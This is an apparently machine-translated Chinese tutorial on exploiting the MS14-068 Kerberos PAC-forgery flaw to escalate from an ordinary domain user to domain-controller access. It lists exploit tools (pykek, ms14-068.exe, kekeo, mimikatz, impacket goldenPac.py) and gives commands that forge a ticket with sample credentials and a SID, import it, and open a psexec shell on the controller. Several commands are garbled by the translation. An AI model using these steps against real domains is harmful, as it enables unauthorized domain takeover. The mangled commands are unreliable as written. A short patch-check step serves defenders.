.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
MS14-068
MS14-068
https://WWW.SE7ENSEC.CN/2021/10/20/20/%E5%9F%9F%E6%B8%97%E9%80%80%8F-KERBEROS% E5%9F%9F%E8%AE%A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%89%96%E6%9E%90/#Pac-1
MS14068是一个权限升级漏洞,可以使普通用户能够增加其对域控制权限的权力。攻击者可以通过构建特定的请求数据包来实现升级权限的目的。
这种漏洞的主要问题是,KDC将根据指定PAC中的数字签名和PAC的加密算法的加密算法来验证PAC的合法性。这使攻击者可以通过锻造PAC来修改PAC中的SID,从而导致KDC判断攻击者是一个高私密的用户,从而导致了特权升级脆弱性。
漏洞补丁地址: https://Technet.microsoft.com/zh-cn/library/security/security/MS14-068
使用方法
MS14-068的相应补丁是KB3011780。您可以检查此补丁是否通过域控制上的SystemInfo安装。
1SystemInfo |查找'3011780'
keoko
12KLIST清除清除账单Kekeo'Exploit3:MS14068 /domain:ROOTKIT.ORG /user33: py:https://github.com/mubix/pykek
exe:https://github.com/ianxtianxt/ms14-068
参数描述:
-U域帐户@Domain名称
-p是当前用户的密码
-s是当前用户的SID值。可以通过Whoami/All获得用户的SID值。
-d是当前域的域控制
–RC4 Hash适用于当前用户
通过DIR访问域控制的共享文件夹,并促使访问被拒绝。 1dir \\ owa2013.rootkit.org \ c $
Generate ticket 1MS14-068.exe -u sqladmin@rootkit.org -p Admin12345 -s S-1-5-21-3759881954-2993291187-3577547808-1613 -d OWA2013.rootkit.org
成功执行脚本将在当前目录中生成CCACHE文件。在导入票证之前,请在CMD中使用命令KLIST净化,或使用Mimikatz中的Kerberos:Purge删除当前缓存的Kerberos票。 1KLIST清除
使用mimikatz 1mimikatz'kerberos:ptc tgt_sqladmin@rootkit.org.ccace'Exit导入生成的CCACHE文件。
您可以再次通过DIR成功访问域控件共享。
Pykek
Goldenpac.py在Impacket工具套件中,该工具是组合MS14-068 Plus PSEXEC的产物,非常易于使用。
1python goldenpac.py -dc-ip 192.168.3.144 -target-ip 192.168.3.144 rootkit.org/sqladmin3:admin12345@owa ewoawa extim32013.rootkit.org https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2014/ms14-068
https://daiker.gitbook.io/windows-protocol/kerberos/3#0x00-qian-yan
https://cloud.tencent.com/developer/article/1760132
https://www.cnblogs.com/backlion/p/6820744.html